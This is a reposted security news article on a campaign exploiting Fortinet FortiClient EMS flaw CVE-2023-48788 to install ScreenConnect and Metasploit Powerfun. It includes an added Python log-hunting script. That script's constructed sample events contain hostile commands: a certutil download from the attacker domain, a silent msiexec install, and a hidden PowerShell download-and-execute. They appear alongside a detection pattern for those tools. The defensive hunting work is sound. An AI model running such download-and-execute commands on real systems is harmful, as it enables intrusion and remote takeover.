New attack: hackers deploy ScreenConnect and Metasploit

admin | 2024-04-19 03:00:22 | 4 views | 3,436 characters | 11 min 27 s read


Cybersecurity researchers have discovered a new campaign that's exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.


The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.


Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun owing to the use of ScreenConnect and Powerfun for post-exploitation.


The intrusion, which began shortly after a proof-of-concept (PoC) exploit for the flaw was published on March 21, 2024, targeted an unnamed media company whose vulnerable FortiClient EMS device was exposed to the internet.


Over the following days, the unknown adversary was observed using the flaw in repeated, unsuccessful attempts to download ScreenConnect and then install the remote desktop software with the msiexec utility.


However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.



Also detected were SQL statements that used certutil to download ScreenConnect from a remote domain ("ursketz[.]com"); the installer was then run with msiexec, after which the software connected out to a command-and-control (C2) server.

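The chain described above (certutil fetching ScreenConnect from ursketz[.]com, msiexec installing it, PowerShell pulling Metasploit's Powerfun script and connecting back out) leaves a distinctive trail in process-creation telemetry. Because CVE-2023-48788 is a SQL injection in the EMS server, the attacker's commands run as children of the host's SQL Server process (the public PoC reaches command execution through SQL Server's xp_cmdshell), so a shell spawned by sqlservr.exe is the pivot for a hunt. The following Python is an added example and is not code from the original article or from Forescout's report. Everything in it is an assumption except the ursketz[.]com indicator and the three tool names, which come from the text: the key=value event layout is made up for the example, the hostnames, file paths, instance name and the 203.0.113.10 address are constructed, and the sample log lines are not real telemetry.

```python
"""Hunt for the Connect:fun post-exploitation chain in process-creation events.

Added example, not code from the Forescout report or the original article.
Log lines, hosts, paths and the TEST-NET address below are constructed; the
key=value layout is an assumption, not any vendor's native format.
"""
import re

# Constructed sample events (Sysmon-Event-ID-1-like key=value, one per line).
# ursketz[.]com is the defanged domain named in the report; everything else is made up.
SAMPLE_EVENTS = r"""
EventID=1 Host=EMS01 ParentImage=C:\Program Files\Microsoft SQL Server\MSSQL15.FCEMS\MSSQL\Binn\sqlservr.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c certutil -urlcache -split -f https://ursketz[.]com/sc.msi C:\Windows\Temp\sc.msi
EventID=1 Host=EMS01 ParentImage=C:\Program Files\Microsoft SQL Server\MSSQL15.FCEMS\MSSQL\Binn\sqlservr.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c msiexec /i C:\Windows\Temp\sc.msi /qn
EventID=1 Host=EMS01 ParentImage=C:\Program Files\Microsoft SQL Server\MSSQL15.FCEMS\MSSQL\Binn\sqlservr.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/powerfun.ps1')
EventID=1 Host=EMS01 ParentImage=C:\Program Files\Microsoft SQL Server\MSSQL15.FCEMS\MSSQL\Binn\sqlservr.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c whoami
EventID=1 Host=WS07 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c certutil -hashfile C:\Users\bob\setup.exe SHA256
"""

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Indicator from the report (defanged there as ursketz[.]com).
IOC_DOMAINS = {"ursketz.com"}

# The three tools the report names, in their downloader/installer roles.
DOWNLOAD_INSTALL = re.compile(
    r"certutil(?:\.exe)?\s.*-urlcache"      # certutil used to fetch a file
    r"|msiexec(?:\.exe)?\s.*/i\b"           # MSI install (the ScreenConnect installer)
    r"|powershell(?:\.exe)?\s.*(?:downloadstring|downloadfile|invoke-expression|\biex\b)",
    re.IGNORECASE,
)
KV = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line: str) -> dict:
    """Split one key=value event line into a dict; values may contain spaces."""
    return dict(KV.findall(line))


def classify(event: dict) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one process-creation event."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    reasons = []
    # A shell under SQL Server is how xp_cmdshell-style execution shows up on the host.
    shell_from_sql = parent == "sqlservr.exe" and image in SHELLS
    if shell_from_sql:
        reasons.append("shell spawned by sqlservr.exe (command execution via SQL Server)")
    tool = DOWNLOAD_INSTALL.search(cmd)
    if tool:
        reasons.append("download/install tool in command line: " + tool.group(0).split()[0])
    refanged = cmd.replace("[.]", ".").lower()   # compare against defanged IOCs
    hits = sorted(d for d in IOC_DOMAINS if d in refanged)
    if hits:
        reasons.append("known staging/C2 domain: " + ", ".join(hits))
    if shell_from_sql and (tool or hits):
        return "high", reasons
    if reasons:
        return "medium", reasons
    return "none", reasons


def hunt(text: str) -> list[dict]:
    """Run classify() over every event line and return the non-benign findings."""
    findings = []
    for line in text.strip().splitlines():
        ev = parse_event(line)
        sev, why = classify(ev)
        if sev != "none":
            findings.append({"host": ev.get("Host"), "severity": sev,
                             "reasons": why, "cmd": ev.get("CommandLine")})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['host']}: {f['cmd']}")
        for r in f["reasons"]:
            print("          -", r)
```

Against the constructed sample, the three download/install commands under sqlservr.exe score high, the bare whoami under sqlservr.exe scores medium (a shell child of SQL Server is suspicious on its own), and the workstation's certutil hash check is ignored. The same parent/child rule carries over to Windows 4688 events or an EDR query; the regex only adds the specific tools this campaign used.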

There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using Vietnamese and German languages in their infrastructure.


"The observed activity clearly has a manual component, evidenced by all the failed attempts to download and install tools, as well as by the relatively long time taken between attempts," security researcher Sai Molige said.


"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."


Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.


Organizations are advised to apply the patches Fortinet has released for the flaw, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.


References

[1]https://thehackernews.com/2024/04/hackers-exploit-fortinet-flaw-deploy.html


Originally published on the WeChat public account 知机安全: 新攻击:黑客部署ScreenConnect和Metasploit

Posted by admin on CN-SEC中文网; please keep this link when reposting: http://cn-sec.com/archives/2669317.html
